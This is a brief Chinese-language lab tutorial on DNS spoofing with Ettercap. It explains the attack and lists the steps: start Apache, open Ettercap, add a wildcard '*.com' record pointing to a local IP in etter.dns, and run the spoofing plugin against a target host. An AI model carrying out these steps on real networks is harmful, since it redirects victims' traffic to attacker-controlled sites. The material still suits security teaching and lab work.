DNS欺骗简介:主机在通过域名访问网站的时候会先向dns服务器发送带有识别码的dns请求,dns服务器返回一个带有同样识别码的dns响应(含有ip地址);攻击者可以将自己伪装成DNS服务器,吸引目标主机的dns请求,对于监听到符合格式的dns请求包将指定的ip地址包装成对应的dns响应包发送给目标主机,和arp欺骗形式类似,都属于中间人攻击,目标主机访问的域名网站会跳转到指定的ip网站
DNS欺骗实操
开启apache服务
/etc/init.d/apache2 start | 开启服务器 |
Ettercap -G | 打开蜘蛛软件 |
具体配置流程
按照下图顺序点击图中按钮
添加dns请求的筛选条件和响应ip
Vim /etc/ettercap/etter.dns | |
文件尾部写入 *.com A 192.168.232.129 | *.com:指定域名请求格式为所有的.com网站的dns请求 A:指定响应替换的ip,这里的ip可以随便指定 |
Cat /etc/ettercap/etter.dns |
运行dns欺骗插件
此时dns欺骗环境已经搭建完成,目标主机访问网站